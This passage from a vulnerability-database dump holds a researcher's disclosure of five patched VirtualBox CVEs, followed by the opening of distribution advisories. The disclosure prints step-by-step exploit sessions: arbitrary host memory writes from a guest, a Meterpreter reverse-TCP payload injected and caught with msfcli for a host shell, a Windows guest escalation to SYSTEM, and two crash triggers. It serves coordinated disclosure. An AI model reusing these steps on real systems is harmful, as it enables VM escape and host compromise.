nothing written at this arbitrarily-chosen location in the host-side VBox process memory\r\n$ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x804eff0)) count=16 2> /dev/null | hd\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n00000010\r\n\r\n- Run the exploit in the guest VM, specifying what to write and where\r\n$ ssh -p2222 root@foo4 'insmod vmmdev_vuln_oflow.ko addr=0x804eff0 val=`echo -n "Hi from guest!" | hexdump -e "/1 "\""%x"\"`'\r\n\r\n- Demonstrate that the string was successfully written to the aforementioned host-side location\r\n$ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x804eff0)) count=16 2> /dev/null | hd\r\n00000000 48 69 20 66 72 6f 6d 20 67 75 65 73 74 21 00 00 |Hi from guest!..|\r\n00000010\r\n\r\n- Run the exploit in the guest VM again, this time to generate a SIGSEGV in the process\r\n$ ssh -p2222 root@foo4 'rmmod vmmdev_vuln_oflow.ko; insmod ~mattd/vmmdev_vuln_oflow.ko addr=0xdeadbeef val=4142434445'\r\nConnection to foo4 closed by remote host.\r\n\r\n- Demonstrate that the host-side VBox process did indeed die\r\n$ dmesg | tail -n1\r\n[24916.950477] GuestPropSvc[12681]: segfault at deadbeef ip b758b55f sp b49091bc error 7 in libc-2.17.so[b750c000+1a9000]\r\n\r\n- Check out the generated core dump\r\n$ gdb /usr/lib/virtualbox/VBoxHeadless core\r\nGNU gdb (GDB) 7.6 (Debian 7.6-5)\r\nCopyright (C) 2013 Free Software Foundation, Inc.\r\n(...)\r\nCore was generated by `/usr/lib/virtualbox/VBoxHeadless --comment foo4 --startvm d8eac50d-f6d7-4b04-bf'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:98\r\n98 ../sysdeps/i386/i686/multiarch/../memcpy.S: No such file or directory.\r\n(gdb) bt\r\n#0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:98\r\n#1 0xb5f0c1c4 in guestProp::Service::getProperty (this=this@entry=0xb5101048, cParms=cParms@entry=4, paParms=paParms@entry=0xaa2635dc)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:609\r\n#2 0xb5f0e7ce in guestProp::Service::call (this=0xb5101048, callHandle=0xaa263a60, u32ClientID=7, eFunction=1, cParms=4, paParms=0xaa2635dc)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:1260\r\n#3 0xb6154e8e in hgcmServiceThread (ThreadHandle=2147483665, pvUser=0x8cb89c0)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Main/src-client/HGCM.cpp:603\r\n#4 0xb6153783 in hgcmWorkerThreadFunc (ThreadSelf=0x8cb8bc0, pvUser=0x8cb8a38)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Main/src-client/HGCMThread.cpp:194\r\n#5 0xb743a1fe in rtThreadMain (pThread=0x8cb8bc0, NativeThread=3029375808, pszThreadName=0x8cb914c "GuestPropSvc")\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Runtime/common/misc/thread.cpp:712\r\n#6 0xb748a429 in rtThreadNativeMain (pvArgs=0x8cb8bc0) at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Runtime/r3/posix/thread-posix.cpp:321\r\n#7 0xb76c7cf1 in start_thread (arg=0xb4909b40) at pthread_create.c:311\r\n#8 0xb75fafee in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:131\r\n(gdb) x/2i $pc\r\n=> 0xb758b55f <__memcpy_ia32+95>: movsw %ds:(%esi),%es:(%edi)\r\n 0xb758b561 <__memcpy_ia32+97>: rep movsl %ds:(%esi),%es:(%edi)\r\n(gdb) i r esi edi eax\r\nesi 0xb5102a74 -1257231756\r\nedi 0xdeadbeef -559038737\r\neax 0x6 6\r\n(gdb) x/6c $esi\r\n0xb5102a74: 65 'A' 66 'B' 67 'C' 68 'D' 69 'E' 0 '\000'\r\n(gdb) fr 1\r\n#1 0xb5f0c1c4 in guestProp::Service::getProperty (this=this@entry=0xb5101048, cParms=cParms@entry=4, paParms=paParms@entry=0xaa2635dc)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:609\r\n609 memcpy(pchBuf, pProp->mValue.c_str(), cbValue);\r\n(gdb) p pchBuf\r\n$1 = 0xdeadbeef <Address 0xdeadbeef out of bounds>\r\n(gdb) p pProp->mValue\r\n$2 = {static npos = <optimized out>, _M_dataplus = {<std::allocator<char>> = {<__gnu_cxx::new_allocator<char>> = {<No data fields>}, <No data fields>},\r\n _M_p = 0xb5102a74 "ABCDE"}}\r\n\r\nOne can use a separate utility script that provides a series of (addr, val)\r\npairs to insert the module with repeatedly so as to write (almost) any\r\narbitrary binary data. It does this by suggesting to write a series of\r\nindividually UTF-8 valid strings at monotonically increasing addresses. This\r\nwas tested with a Meterpreter payload to get a shell on the host:\r\n\r\n(on the VM:)\r\n\r\n- Show the Meterpreter almost-pure-ASCII payload\r\nfoo4$ hd reverse-tcp-payload | head\r\n00000000 54 59 da c4 d9 71 f4 5f 57 59 49 49 49 49 49 49 |TY...q._WYIIIIII|\r\n00000010 49 49 49 49 43 43 43 43 43 43 37 51 5a 6a 41 58 |IIIICCCCCC7QZjAX|\r\n00000020 50 30 41 30 41 6b 41 41 51 32 41 42 32 42 42 30 |P0A0AkAAQ2AB2BB0|\r\n00000030 42 42 41 42 58 50 38 41 42 75 4a 49 50 31 49 4b |BBABXP8ABuJIP1IK|\r\n00000040 6c 37 6a 43 52 73 52 63 70 53 53 5a 47 72 6e 50 |l7jCRsRcpSSZGrnP|\r\n00000050 50 66 4d 59 78 61 48 4d 6b 30 6c 57 31 4b 51 78 |PfMYxaHMk0lW1KQx|\r\n00000060 49 50 6e 48 46 61 46 30 52 48 66 62 73 30 77 61 |IPnHFaF0RHfbs0wa|\r\n00000070 51 4c 4d 59 78 61 31 7a 73 56 63 68 56 30 63 61 |QLMYxa1zsVchV0ca|\r\n00000080 36 37 4e 69 4b 51 63 73 48 4d 4d 50 4f 42 56 67 |67NiKQcsHMMPOBVg|\r\n00000090 6f 49 55 50 74 50 77 70 53 30 6d 59 7a 43 6f 31 |oIUPtPwpS0mYzCo1|\r\n\r\n- Show the output of the aforementioned string -> (addr, val) script on the payload\r\nfoo4$ ./bin2args.py $((0x8050830)) < reverse-tcp-payload | head -n5\r\naddr=0x8050830 val=5459\r\naddr=0x8050832 val=dabf\r\naddr=0x8050833 val=c4bf\r\naddr=0x8050834 val=d9bf\r\naddr=0x8050835 val=71\r\n\r\n- Use the script to write the payload into host-side VBox process memory\r\nfoo4$ ./bin2args.py $((0x8050830)) < reverse-tcp-payload | sudo xargs -n2 -I{} sh -c 'rmmod vmmdev_vuln_oflow; insmod vmmdev_vuln_oflow.ko {}'\r\nError: Module vmmdev_vuln_oflow is not currently loaded\r\n\r\n- Write the payload's address to a function pointer in the process\r\nfoo4$ sudo rmmod vmmdev_vuln_oflow; sudo insmod vmmdev_vuln_oflow.ko addr=0x0804e6f0 val=30080508\r\n\r\n- Trigger the payload\r\nfoo4$ sudo halt\r\n\r\nBroadcast message from root@debian (pts/0) (Tue Oct 22 01:20:40 2013):\r\n\r\nThe system is going down for system halt NOW!\r\n\r\n(on the attacker's end:)\r\n\r\n- Start a Meterpreter session and wait for connection\r\n$ msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.80 E\r\n[*] Please wait while we load the module tree...\r\n(...)\r\n =[ metasploit v4.7.0-1 [core:4.7 api:1.0]\r\n+ -- --=[ 1141 exploits - 720 auxiliary - 194 post\r\n+ -- --=[ 309 payloads - 30 encoders - 8 nops\r\n\r\nPAYLOAD => linux/x86/meterpreter/reverse_tcp\r\nLHOST => 192.168.1.80\r\n[*] Started reverse handler on 192.168.1.80:4444\r\n[*] Starting the payload handler...\r\n[*] Transmitting intermediate stager for over-sized stage...(100 bytes)\r\n[*] Sending stage (1126400 bytes) to 192.168.1.80\r\n[*] Meterpreter session 1 opened (192.168.1.80:4444 -> 192.168.1.80:49648) at 2013-10-22 01:20:53 +1300\r\n\r\nmeterpreter > shell\r\nProcess 16070 created.\r\nChannel 1 created.\r\n/bin/sh: 0: can't access tty; job control turned off\r\n$ ps f --sid `ps -o sid $$ | tail -n+2`\r\n PID TTY STAT TIME COMMAND\r\n15959 ? Sl 1:37 /usr/lib/virtualbox/VBoxHeadless --comment foo4 --sta\r\n16070 ? S 0:00 \_ /bin/sh\r\n16082 ? R 0:00 \_ ps f --sid 15935\r\n\r\nSpecifically, the POC uses the Shared Properties service to get\r\nattacker-controlled data to be written out as an HGCM result. It also uses\r\nthis service specifically because it can handle the necessary four arguments\r\nfor the exploit to function (name + skip + overflow + skip). Null page lists\r\nare used to skip address space, allowing one to write the attacker-chosen\r\nmemory location to the second HGCM output argument (property value output)\r\nhost buffer pointer.\r\n\r\nOn 32-bit hosts, this works fine. On 64-bit ones, because the HGCM size is\r\ncalculated using a 32-bit variable ("cbCmdSize"), one cannot wrap the 64-bit\r\naddress space entirely, however one can still overflow up to 4GB after the\r\nVBOXHGCMCMD structure for a traditional heap-based attack.\r\n\r\n\r\n* Vuln. #2: VMMDev HGCM argument type confusion (CVE-2014-0407)\r\n\r\nProcessing a HGCM call is a three step-process: reading the arguments from the\r\nguest, invoking the HGCM connector to make the call, and writing the result\r\nback out to the guest. Between these steps, when using the default HGCM\r\nconnector, the guest may run for a limited amount of time (the result code\r\nreturned at step 2 is VINF_HGCM_ASYNC_EXECUTE). This issue lies in the fact\r\nthat the argument types are re-read from guest-controlled memory at step 3,\r\nwhen the result is being written out. By racing to change the type of an\r\nargument between steps 1 and 3, incorrect processing can occur. This includes\r\nthings such as treating what was initially a guest-provided integer argument\r\nas the location of an argument buffer to read a result from, if the new type\r\nwould normally have one.\r\n\r\nThis can be exploited to read cleanly from anywhere in host ring 3 address\r\nspace - an ASLR-proof information leak of arbitrary length, complementing the\r\nfirst vulnerability.\r\n\r\nThis leads to a host ring 3 information leak to guest ring 0.\r\n\r\nA POC exploit in the form of a Linux kernel module which takes an "addr"\r\nargument to specify where to read from host ring 3 memory, outputting the\r\nresult to the kernel ring buffer (ie. viewable with `dmesg`) was created (and\r\nsent in the full report):\r\nmattd@debian:~$ /sbin/modinfo vmmdev_vuln_typeconf.ko\r\nfilename: /home/mattd/vmmdev_vuln_typeconf.ko\r\nlicense: Dual BSD/GPL\r\ndepends:\r\nvermagic: 3.2.0-4-486 mod_unload modversions 486\r\nparm: addr:Host-ring3 address to read from (ulong)\r\n\r\nHere is an example exploitation session:\r\n\r\n- Observe the address space of the host-side VBox process to find where the ELF itself was loaded\r\n$ sudo head /proc/`pidof VBoxHeadless`/maps\r\n08048000-0804e000 r-xp 00000000 68:01 4083239 /usr/lib/virtualbox/VBoxHeadless\r\n0804e000-0804f000 rw-p 00005000 68:01 4083239 /usr/lib/virtualbox/VBoxHeadless\r\n0804f000-08051000 rw-p 00000000 00:00 0\r\n08255000-082df000 rw-p 00000000 00:00 0 [heap]\r\na8d00000-a8f00000 rw-s 00000000 00:04 989 /dev/zero (deleted)\r\na8f00000-a9100000 rw-s 00000000 00:04 988 /dev/zero (deleted)\r\na9100000-a9300000 rw-s 00000000 00:04 7084 /dev/zero (deleted)\r\na9300000-a9500000 rw-s 00000000 00:04 981 /dev/zero (deleted)\r\na9500000-a9700000 rw-s 00000000 00:04 980 /dev/zero (deleted)\r\na9700000-a9900000 rw-s 00000000 00:04 7081 /dev/zero (deleted)\r\n\r\n- Check out the contents at the aforementioned load address\r\n$ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x08048000)) count=256 2> /dev/null | hd\r\n00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|\r\n00000010 02 00 03 00 01 00 00 00 b4 8c 04 08 34 00 00 00 |............4...|\r\n00000020 c8 59 00 00 00 00 00 00 34 00 20 00 08 00 28 00 |.Y......4. ...(.|\r\n00000030 1c 00 1b 00 06 00 00 00 34 00 00 00 34 80 04 08 |........4...4...|\r\n00000040 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 |4...............|\r\n00000050 04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08 |........4...4...|\r\n00000060 34 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 |4...............|\r\n00000070 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 |................|\r\n00000080 00 80 04 08 ec 56 00 00 ec 56 00 00 05 00 00 00 |.....V...V......|\r\n00000090 00 10 00 00 01 00 00 00 ec 56 00 00 ec e6 04 08 |.........V......|\r\n000000a0 ec e6 04 08 cc 01 00 00 6c 24 00 00 06 00 00 00 |........l$......|\r\n000000b0 00 10 00 00 02 00 00 00 f8 56 00 00 f8 e6 04 08 |.........V......|\r\n000000c0 f8 e6 04 08 f8 00 00 00 f8 00 00 00 06 00 00 00 |................|\r\n000000d0 04 00 00 00 04 00 00 00 48 01 00 00 48 81 04 08 |........H...H...|\r\n000000e0 48 81 04 08 44 00 00 00 44 00 00 00 04 00 00 00 |H...D...D.......|\r\n000000f0 04 00 00 00 50 e5 74 64 8c 4d 00 00 8c cd 04 08 |....P.td.M......|\r\n00000100\r\n\r\n- Run the exploit on the guest VM, specifying the host-side address to read from\r\n$ ssh -p2222 root@foo4 insmod vmmdev_vuln_typeconf.ko addr=$((0x08048000))\r\n\r\n- Observe the output in the guest VM's dmesg and see that it is as expected\r\n$ ssh -p2222 foo4 'dmesg | grep -A15 "vmmdev_vuln_typeconf: 00000000"'\r\n[ 477.168335] vmmdev_vuln_typeconf: 00000000: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............\r\n[ 477.168393] vmmdev_vuln_typeconf: 00000010: 02 00 03 00 01 00 00 00 b4 8c 04 08 34 00 00 00 ............4...\r\n[ 477.168443] vmmdev_vuln_typeconf: 00000020: c8 59 00 00 00 00 00 00 34 00 20 00 08 00 28 00 .Y......4. ...(.\r\n[ 477.168470] vmmdev_vuln_typeconf: 00000030: 1c 00 1b 00 06 00 00 00 34 00 00 00 34 80 04 08 ........4...4...\r\n[ 477.168497] vmmdev_vuln_typeconf: 00000040: 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 4...............\r\n[ 477.168525] vmmdev_vuln_typeconf: 00000050: 04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08 ........4...4...\r\n[ 477.168552] vmmdev_vuln_typeconf: 00000060: 34 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 4...............\r\n[ 477.168579] vmmdev_vuln_typeconf: 00000070: 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 ................\r\n[ 477.168606] vmmdev_vuln_typeconf: 00000080: 00 80 04 08 ec 56 00 00 ec 56 00 00 05 00 00 00 .....V...V......\r\n[ 477.168633] vmmdev_vuln_typeconf: 00000090: 00 10 00 00 01 00 00 00 ec 56 00 00 ec e6 04 08 .........V......\r\n[ 477.168675] vmmdev_vuln_typeconf: 000000a0: ec e6 04 08 cc 01 00 00 6c 24 00 00 06 00 00 00 ........l$......\r\n[ 477.168702] vmmdev_vuln_typeconf: 000000b0: 00 10 00 00 02 00 00 00 f8 56 00 00 f8 e6 04 08 .........V......\r\n[ 477.168729] vmmdev_vuln_typeconf: 000000c0: f8 e6 04 08 f8 00 00 00 f8 00 00 00 06 00 00 00 ................\r\n[ 477.168756] vmmdev_vuln_typeconf: 000000d0: 04 00 00 00 04 00 00 00 48 01 00 00 48 81 04 08 ........H...H...\r\n[ 477.168784] vmmdev_vuln_typeconf: 000000e0: 48 81 04 08 44 00 00 00 44 00 00 00 04 00 00 00 H...D...D.......\r\n[ 477.168811] vmmdev_vuln_typeconf: 000000f0: 04 00 00 00 50 e5 74 64 8c 4d 00 00 8c cd 04 08 ....P.td.M......\r\n\r\nThis works fine on a 32-bit host. On 64-bit hosts, one cannot use the\r\n'int-as-address' technique because of differing resizing + alignment issues in\r\nVBOXHGCMSVCPARM's union used to hold the argument information host-side (at\r\nleast on GCC); other methods might be possible instead.\r\n\r\n\r\n* Vuln. #3: Windows Shared Folder Redirector IOCTL_MRX_VBOX_DELCONN\r\n missing validation (CVE-2014-0405)\r\n\r\nWhen handling an IOCTL_MRX_VBOX_DELCONN request, the Windows Shared Folder\r\nRedirector attempts to retrieve the associated RDBSS file object extension\r\n(FOBX) from the user-provided file's FsContext2 field. It does not check,\r\nhowever, that one actually exists (is non-null), and hence the driver can be\r\nled to execute upon a user-provided FOBX by placing a crafted one in the null\r\nmemory page. This execution involves calling a FOBX-provided callback, which\r\ncan point to a user-provided routine.\r\n\r\nThis IOCTL is defined as FILE_ANY_ACCESS and so can be called by any Windows\r\nuser, regardless of access rights.\r\n\r\nThis leads to a guest ring 3 to guest ring 0 privilege escalation (and nicely\r\ncomplements the guest ring 0 to host ring 3 vulnerability,\r\n#1 / CVE-2013-5892!)\r\n\r\nA POC exploit in the form of a Windows application that executes a given\r\ncommand line (or cmd.exe as a default) as the SYSTEM user regardless of what\r\nuser it is run as initially was created (and sent in the full report):\r\n\r\nHere is a sample exploitation session (in the guest VM):\r\n\r\n- Check the current user's username and assigned groups\r\nE:\>whoami /user /groups\r\n[User] = "LOLTECH-GPG0BTT\limited"\r\n\r\n[Group 1] = "LOLTECH-GPG0BTT\None"\r\n[Group 2] = "Everyone"\r\n[Group 3] = "BUILTIN\Users"\r\n[Group 4] = "LOCAL"\r\n[Group 5] = "NT AUTHORITY\INTERACTIVE"\r\n[Group 6] = "NT AUTHORITY\Authenticated Users"\r\n\r\n- Demonstrate the access level by showing that we cannot create a file in a restricted directory\r\nE:\>echo > c:\windows\test.txt\r\nAccess is denied.\r\n\r\n- Run the exploit\r\nE:\>vboxrdr_vuln_devcontrol.exe\r\n\r\n(... a new command prompt opens ...)\r\n\r\n- Check the new current user's username and assigned groups\r\nC:\WINDOWS>whoami /user /groups\r\n[User] = "NT AUTHORITY\SYSTEM"\r\n\r\n[Group 1] = "BUILTIN\Administrators"\r\n[Group 2] = "Everyone"\r\n[Group 3] = "NT AUTHORITY\Authenticated Users"\r\n\r\n- Demonstrate the new access level by showing that we can now create the aforementioned file\r\nC:\WINDOWS>echo > c:\windows\test.txt\r\n\r\nC:\WINDOWS>\r\n\r\nOn 32-bit guests this works fine, and on 64-bit ones it should also work, with\r\nthe necessary changes to the crafted FOBX structure.\r\n\r\n\r\nThe last two vulnerabilities are a bit more boring.\r\n\r\n\r\n* Vuln. #4: VMMDev SetPointerShape missing validation (CVE-2014-0406)\r\n\r\nThe VMMDevReq_SetPointerShape request handler does not validate the given\r\nwidth and height against the actual amount of request data given (ie.\r\npointerData), and hence can be made to read off the end of the request.\r\n\r\nThis leads to a guest-triggerable DOS of the host-side VBox process.\r\n\r\nA POC exploit in the form of a Linux kernel module was created (and sent in\r\nthe full report).\r\n\r\nHere is a sample session:\r\n\r\n- Run the exploit in the guest VM\r\n$ ssh -p2222 root@foo4 insmod vmmdev_vuln_shape.ko\r\nConnection to foo4 closed by remote host.\r\n\r\n- Check out the generated core dump\r\n$ gdb /usr/lib/virtualbox/VBoxHeadless core\r\nGNU gdb (GDB) 7.6 (Debian 7.6-5)\r\nCopyright (C) 2013 Free Software Foundation, Inc.\r\n(...)\r\nCore was generated by `/usr/lib/virtualbox/VBoxHeadless --startvm foo4'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:74\r\n74 ../sysdeps/i386/i686/multiarch/../memcpy.S: No such file or directory.\r\n(gdb) bt\r\n#0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:74\r\n#1 0xa8910008 in ?? ()\r\n#2 0xb329969b in vmmdevRequestHandler (pDevIns=pDevIns@entry=0xb46d8dc0, pvUser=pvUser@entry=0xb46d8e80, Port=Port@entry=53280, u32=u32@entry=102366948,\r\n cb=cb@entry=4) at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDev.cpp:1178\r\n[..omitted..]\r\n(gdb) fr 2\r\n#2 0xb329969b in vmmdevRequestHandler (pDevIns=pDevIns@entry=0xb46d8dc0, pvUser=pvUser@entry=0xb46d8e80, Port=Port@entry=53280, u32=u32@entry=102366948,\r\n cb=cb@entry=4) at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDev.cpp:1178\r\n1178 pointerShape->pointerData);\r\n(gdb) l\r\n1173 pThis->pDrv->pfnUpdatePointerShape(pThis->pDrv,\r\n1174 fVisible,\r\n1175 fAlpha,\r\n1176 pointerShape->xHot, pointerShape->yHot,\r\n1177 pointerShape->width, pointerShape->height,\r\n1178 pointerShape->pointerData);\r\n1179 }\r\n1180 else\r\n1181 {\r\n1182 pThis->pDrv->pfnUpdatePointerShape(pThis->pDrv,\r\n\r\nThis works fine regardless of host architecture width (32/64-bit).\r\n\r\n\r\n* Vuln. #5: Bad assert in vmmdevHGCMSaveLinPtr (CVE-2014-0404)\r\n\r\nThe AssertRelease at the end of vmmdevHGCMSaveLinPtr checks whether the amount\r\nof pages successfully saved is equal to the entire amount given. This assert\r\ncan be guest-triggered by simply invoking a HGCM call with an invalid linear\r\npointer argument.\r\n\r\nThis leads to a guest-triggerable DOS of the host-side VBox process.\r\n\r\nA POC exploit in the form of a Linux kernel module was created (and sent in\r\nthe full report).\r\n\r\nHere is a sample session:\r\n\r\n- Run the exploit in the guest VM\r\n$ ssh -p2222 root@foo4 insmod vmmdev_vuln_linaddrout.ko\r\nConnection to foo4 closed by remote host.\r\n\r\n- Check the end of the log output from the now-dead host-side VBox process\r\n$ tail VirtualBox\ VMs/foo4/Logs/VBox.log\r\n00:01:04.537820 NAT: DNS#0: 192.168.1.8\r\n00:01:04.537877 NAT: DHCP offered IP address 10.0.2.15\r\n00:01:04.539477 PATM: Disabling IDT 3a patch handler c1288334\r\n00:01:16.994365 PATM: Disabling IDT 39 patch handler c1288330\r\n00:01:48.235937 NAT: old socket rcv size: 128KB\r\n00:01:48.235994 NAT: old socket snd size: 128KB\r\n00:01:48.541291\r\n00:01:48.541294 !!Assertion Failed!!\r\n00:01:48.541295 Expression: iPage == cPages\r\n00:01:48.541297 Location : /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDevHGCM.cpp(297) int vmmdevHGCMSaveLinPtr(PPDMDEVINS, uint32_t, RTGCPTR, uint32_t, uint32_t, VBOXHGCMLINPTR*, RTGCPHYS**)\r\n\r\nThis works fine regardless of host architecture width (32/64-bit).\r\n\r\n\r\nFor more procedural details such as the versions of VirtualBox that are\r\naffected and those that are not, how to get updates and other information,\r\nplease see Oracle's CPU advisory itself (linked at the start of this mail.)\r\n\r\n\r\nCheers!\r\n\r\n- Matthew Daley\r\n", "edition": 1, "cvss3": {}, "published": "2014-02-10T00:00:00", "title": "Information on recently-fixed Oracle VM VirtualBox vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0405", "CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407", "CVE-2013-5892"], "modified": "2014-02-10T00:00:00", "id": "SECURITYVULNS:DOC:30292", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30292", "cvss": {"score": 3.5, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:46:15", "description": "Quarterly update fixes 144 different vulnerabilities.", "edition": 2, "cvss3": {}, "published": "2014-05-05T00:00:00", "title": "Oracle / Sun / MySQL / PeopleSoft / OpenJDK applications multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0371", "CVE-2012-3544", "CVE-2014-0400", "CVE-2013-5879", "CVE-2013-5876", "CVE-2013-5889", "CVE-2013-5909", "CVE-2014-0392", "CVE-2013-5873", "CVE-2013-5858", "CVE-2014-0405", "CVE-2013-5860", "CVE-2014-0367", "CVE-2014-0385", "CVE-2013-5878", "CVE-2014-0410", "CVE-2014-0398", "CVE-2013-5897", "CVE-2013-2071", "CVE-2014-0404", "CVE-2014-0415", "CVE-2014-0434", "CVE-2013-5884", "CVE-2014-0435", "CVE-2014-0443", "CVE-2013-5870", "CVE-2014-0390", "CVE-2013-5905", "CVE-2013-5880", "CVE-2013-5904", "CVE-2014-0391", "CVE-2013-5888", "CVE-2013-5893", "CVE-2014-0387", "CVE-2014-0393", "CVE-2014-0399", "CVE-2012-4605", "CVE-2013-5821", "CVE-2014-0431", "CVE-2013-5898", "CVE-2014-0427", "CVE-2014-0441", "CVE-2013-5900", "CVE-2013-1654", "CVE-2014-0433", "CVE-2014-0375", "CVE-2013-5886", "CVE-2014-0401", "CVE-2014-0396", "CVE-2014-0406", "CVE-2013-5872", "CVE-2014-0440", "CVE-2014-0425", "CVE-2013-5883", "CVE-2013-1862", "CVE-2013-5834", "CVE-2014-0418", "CVE-2014-0373", "CVE-2013-5877", "CVE-2013-5874", "CVE-2014-0439", "CVE-2014-0394", "CVE-2013-5887", "CVE-2014-0408", "CVE-2014-0376", "CVE-2014-0422", "CVE-2014-0419", "CVE-2014-0411", "CVE-2014-0369", "CVE-2014-0366", "CVE-2013-5882", "CVE-2013-5895", "CVE-2003-1067", "CVE-2014-0437", "CVE-2013-5885", "CVE-2013-5901", "CVE-2013-5881", "CVE-2013-2067", "CVE-2014-0389", "CVE-2014-0388", "CVE-2013-5899", "CVE-2014-0412", "CVE-2013-5896", "CVE-2013-3830", "CVE-2014-0417", "CVE-2014-0372", "CVE-2014-0407", "CVE-2013-5910", "CVE-2013-5906", "CVE-2014-0428", "CVE-2013-5891", "CVE-2014-0382", "CVE-2014-0370", "CVE-2013-5808", "CVE-2013-5871", "CVE-2014-0402", "CVE-2013-2924", "CVE-2014-0368", "CVE-2014-0420", "CVE-2013-5853", "CVE-2014-0423", "CVE-2013-5868", "CVE-2014-0430", "CVE-2014-0374", "CVE-2013-5875", "CVE-2013-5869", "CVE-2013-5907", "CVE-2014-0377", "CVE-2012-3499", "CVE-2013-5902", "CVE-2013-5894", "CVE-2013-5795", "CVE-2007-0009", "CVE-2013-5892", "CVE-2014-0381", "CVE-2014-0383", "CVE-2014-0424", "CVE-2014-0395", "CVE-2013-4316", "CVE-2014-0379", "CVE-2014-0403", "CVE-2013-5908", "CVE-2014-0386", "CVE-2007-1858", "CVE-2013-5785", "CVE-2014-0445", "CVE-2013-5764", "CVE-2014-0444", "CVE-2014-0378", "CVE-2013-5833", "CVE-2013-1620", "CVE-2013-5890", "CVE-2014-0416", "CVE-2014-0380", "CVE-2014-0438"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:VULN:13537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13537", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2022-01-17T19:09:30", "description": "### Background\n\nVirtualBox is a powerful virtualization product from Oracle.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Virtualbox. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker in a guest virtual machine may be able to escalate privileges or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll virtualbox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/virtualbox-4.2.22\"\n \n\nAll virtualbox-bin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/virtualbox-bin-4.2.22\"", "cvss3": {}, "published": "2014-01-20T00:00:00", "type": "gentoo", "title": "VirtualBox: Multiple Vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3221", "CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0405", "CVE-2014-0406", "CVE-2014-0407"], "modified": "2014-01-20T00:00:00", "id": "GLSA-201401-13", "href": "https://security.gentoo.org/glsa/201401-13", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Multiple vulnerabilities in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.20, and 4.3.4 allows local users to affect integrity and availability via unknown vectors related to Core (CVE-2013-5892, CVE-2014-0404, CVE-2014-0405, CVE-2014-0406, CVE-2014-0407). VBox/GuestHost/OpenGL/util/net.c in Oracle VirtualBox before 3.2.22, 4.0.x before 4.0.24, 4.1.x before 4.1.32, 4.2.x before 4.2.24, and 4.3.x before 4.3.8, when using 3D Acceleration allows local guest OS users to execute arbitrary code on the 